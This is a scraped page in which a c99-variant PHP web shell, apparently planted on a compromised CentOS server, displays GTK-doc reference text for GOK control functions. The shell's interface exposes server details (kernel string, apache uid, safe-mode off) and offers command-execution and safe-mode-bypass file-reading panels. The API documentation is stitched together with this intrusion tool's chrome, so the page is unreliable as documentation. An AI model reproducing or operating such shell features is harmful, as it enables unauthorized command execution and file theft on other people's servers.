Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/gtk-doc/html/gok/ drwxr-xr-x |
Viewing file: gok-gok-control.html (10.44 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Synopsisenum ControlTypes; enum ControlFillwiths; enum ControlHandlers; GokControl* gok_control_new (void); void gok_control_delete_all (GokControl *pControl); gint gok_control_get_control_type (gchar *NameControlType); gint gok_control_get_handler_type (gchar *NameControlType); void gok_control_button_handler (GtkButton *button, gpointer user_data); void gok_control_add_handler (GtkWidget *pWidget, gint HandlerType); void gok_control_button_callback_open (void); void gok_control_button_callback_close (void); Detailsenum ControlTypestypedef enum { CONTROL_TYPE_LABEL, CONTROL_TYPE_HBOX, CONTROL_TYPE_VBOX, CONTROL_TYPE_COMBOBOX, CONTROL_TYPE_SEPERATOR, CONTROL_TYPE_FRAME, CONTROL_TYPE_BUTTON, CONTROL_TYPE_CHECKBUTTON, CONTROL_TYPE_RADIOBUTTON, CONTROL_TYPE_SPINBUTTON, MAX_CONTROL_TYPES /* keep this as the last entry in the enum */ } ControlTypes;
enum ControlFillwithstypedef enum { CONTROL_FILLWITH_ACTIONS, CONTROL_FILLWITH_FEEDBACKS, CONTROL_FILLWITH_SOUNDS, CONTROL_FILLWITH_OPTIONS } ControlFillwiths;
enum ControlHandlerstypedef enum { CONTROL_HANDLER_BROWSESOUND, CONTROL_HANDLER_ADVANCED, MAX_CONTROL_HANDLERS /* keep this as the last entry in the enum */ } ControlHandlers;
gok_control_new ()GokControl* gok_control_new (void); Creates a new gok_control. It's the caller's responsibility to delete this.
gok_control_delete_all ()void gok_control_delete_all (GokControl *pControl); Deletes the given control and all other controls linked to it.
gok_control_get_control_type ()gint gok_control_get_control_type (gchar *NameControlType);
gok_control_get_handler_type ()gint gok_control_get_handler_type (gchar *NameControlType);
gok_control_button_handler ()void gok_control_button_handler (GtkButton *button, gpointer user_data);
gok_control_add_handler ()void gok_control_add_handler (GtkWidget *pWidget, gint HandlerType);
gok_control_button_callback_open ()void gok_control_button_callback_open (void); Initializes the GOK control callback handlers. This must be called at the beginning of the program.
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0126 ]-- |